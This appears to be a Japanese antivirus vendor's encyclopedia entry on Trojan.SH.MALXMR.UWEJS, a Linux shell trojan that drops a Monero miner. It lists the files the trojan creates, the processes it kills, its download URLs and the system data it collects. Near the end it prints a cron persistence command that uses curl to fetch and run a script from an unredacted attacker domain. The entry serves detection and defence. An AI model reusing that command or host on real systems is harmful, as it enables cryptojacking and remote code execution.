Trojan.SH.MALXMR.UWEJS
2020年1月8日
別名:
N/A
プラットフォーム:
Linux
危険度:
ダメージ度:
感染力:
感染確認数:
情報漏えい:
- マルウェアタイプ: トロイの木馬型
- 破壊活動の有無: なし
- 暗号化: なし
- 感染報告の有無: はい
概要
感染経路 インターネットからのダウンロード, 他のマルウェアからの作成
マルウェアは、リモートサイトから他のマルウェアまたはグレイウェアにダウンロードされ、コンピュータに侵入します。
マルウェアは、実行後、自身を削除します。
詳細
ファイルサイズ 1,927 bytes
タイプ , Other
メモリ常駐 なし
発見日 2020年1月6日
ペイロード URLまたはIPアドレスに接続, 情報収集, ファイルのダウンロード
侵入方法
マルウェアは、リモートサイトから以下のマルウェアまたはグレイウェアにダウンロードされ、コンピュータに侵入します。
インストール
マルウェアは、以下のファイルを作成し実行します。
- x
- start.pl
マルウェアは、以下のフォルダを作成します。
- /var/tmp/.nano
- /tmp/.vd
他のシステム変更
マルウェアは、以下のファイルを削除します。
- nohup.out
- /tmp/min.sh
- /tmp/min
- /tmp/nohup.out
- /tmp/cron.d
- /var/tmp/.nano
- /{Current Directory}/cron.d
- cron.d
- .bin
- /dev/shm/.bin
- /tmp/.bin
- /dev/shm/monero.tgz
- .vd
- /tmp/.vd
- /tmp/.vd/sslm.tgz
- min*
- {Current Directory}/min*
- /tmp/min*
プロセスの終了
マルウェアは、感染コンピュータ上で以下のプロセスが常駐されていることを確認した場合、そのプロセスを終了します。
- rand
- rx
- rd
- tsm
- tsm2
- haiduc
- a
- sparky
- sh
- 2238Xae
- b
- f
- i
- p
- y
- rsync
- ps
- go
- x
- s
- b
- run
- idle
- minerd
- crond
- yam
- xmr
- python
- cron
- ntpd
- start
- start.sh
- libssl
- sparky.sh
ダウンロード活動
マルウェアは、以下のWebサイトにアクセスして自身のコンポーネントファイルをダウンロードします。
- https://{BLOCKED}ter.com/assets/.style/remote/cron.sh
- https://{BLOCKED}ter.com/assets/.style/nano.sh
- https://{BLOCKED}ter.com/assets/.style/monero.tgz
- https://{BLOCKED}ter.com/assets/.style/sslm.tgz
マルウェアは、以下のファイル名でダウンロードしたファイルを保存します。
- /etc/cron.hourly/cron.sh → detected as Trojan.SH.MALXMR.UWEJT
- /etc/cron.daily/cron.sh → detected as Trojan.SH.MALXMR.UWEJT
- /var/tmp/.nano/nano.sh → detected as Trojan.SH.MALXMR.UWEJT
- /dev/shm/monero.tgz
- /tmp/.vd/sslm.tgz
情報漏えい
マルウェアは、以下の情報を収集します。
- Current Directory
- username
- System time and date
- Kernel Information
- Number of Processing Units
- List of Display Interface
情報収集
マルウェアは、HTTPポスト を介して、収集した情報を以下のURLに送信します。
- http://{BLOCKED}ter.com/assets/.style/remote/info.php
その他
マルウェアは、以下のWebサイトにアクセスして感染コンピュータのIPアドレスを収集します。
- http://upajmeter.com/assets/.style/remote/info.php
マルウェアは、以下を実行します。
- It creates the following cron jobs for persistence:
Path: {Current Directory}/cron.d- Schedule: Every 30 minutes
- Command: */30 * * * * /var/tmp/.nano/nano.sh &> /dev/null @reboot /bin/mkdir /var/tmp/.nnao && /usr/bin/curl -s https://upajmeter.com/assets/.style/nano.sh && /bin/chmod +x /var/tmp/.nano/nano.sh && /var/tmp/.nano/nano.sh
マルウェアは、実行後、自身を削除します。
対応方法
対応検索エンジン: 9.850
初回 VSAPI パターンバージョン 15.608.01
初回 VSAPI パターンリリース日 2020年1月7日
VSAPI OPR パターンバージョン 15.609.00
VSAPI OPR パターンリリース日 2020年1月8日
最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、ウイルス検索を実行してください。「Trojan.SH.MALXMR.UWEJS」と検出したファイルはすべて削除してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。
ご利用はいかがでしたか? アンケートにご協力ください